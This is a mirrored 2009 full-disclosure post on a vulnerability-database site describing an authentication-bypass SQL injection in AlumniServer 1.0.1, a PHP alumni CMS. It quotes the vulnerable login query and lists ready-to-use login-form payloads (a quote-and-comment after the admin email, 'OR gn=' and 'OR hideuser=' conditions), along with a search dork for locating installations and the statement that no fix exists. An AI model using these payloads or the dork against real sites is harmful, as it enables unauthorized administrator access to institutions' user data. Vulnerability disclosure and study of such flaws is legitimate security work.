Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22083
HistoryJun 26, 2009 - 12:00 a.m.

SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1-->

2009-06-2600:00:00
vulners.com
43
JSON

SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1–>

CMS INFORMATION:

–>WEB: http://www.alumniserver.net/
–>DOWNLOAD: http://www.alumniserver.net/
–>DEMO: N/A
–>CATEGORY: CMS/Education
–>DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
and companies. Services for usersinclude profile page,…
–>RELEASED: 2009-06-11

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK: "AlumniServer project"
–>CATEGORY: AUTH-BYPASS (SQLi)
–>AFFECT VERSION: CURRENT
–>Discovered Bug date: 2009-06-16
–>Reported Bug date: 2009-06-16
–>Fixed bug date: N/A
–>Info patch (???): N/A
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#####################
////////////////////

AUTH-BYPASS (SQLi):

////////////////////
#####################

<<<<---------++++++++++++++ Condition: magic quotes=OFF ++++++++++++++++±-------->>>>

VULN FILE:

Path –> [HOME_PATH]/login.php
Lines –> 26, 32, 72

//Note: requestVar is a function against LFI and XSS mainly,
//avoiding register_globals ON and filtering \r\n, \r, \0, etc and using htmlespecialchars.

26: $email=requestVar('login','',true);

32: $pwd=requestVar('password','',true);

72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE
'".md5($pwd)."') LIMIT 1",$dbh); <– Vuln line

EXPLOITS:

[!!!] Case-1: If only one user (rarely)…

~~~~~&gt; Password=nothing


[!!!] Case-2: If more users...


[++] Note: Search mail for admin &#40;http://[HOST]/[PATH]/Imprint.php&#41;:


~~~~~&gt; E-Mail=[real_admin_mail]&#39;&#41;/*
~~~~~&gt; Password=nothing


[++] Note: Search for first or second name.
[++] Note: AdminGn, AdminSn By default. Not use id because it&#39;s generated randomly. With a
registered user 
        is easy to get necessary information.


~~~~~&gt; [email protected]&#39;&#41; OR gn=&#39;AdminGn&#39; /*
~~~~~&gt; Password=nothing


[!!!] Case-3: If admin is a hidden user...


~~~~~&gt; [email protected]&#39;&#41; OR hideuser=&#39;y&#39; /*
~~~~~&gt; Password=nothing




#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################
JSON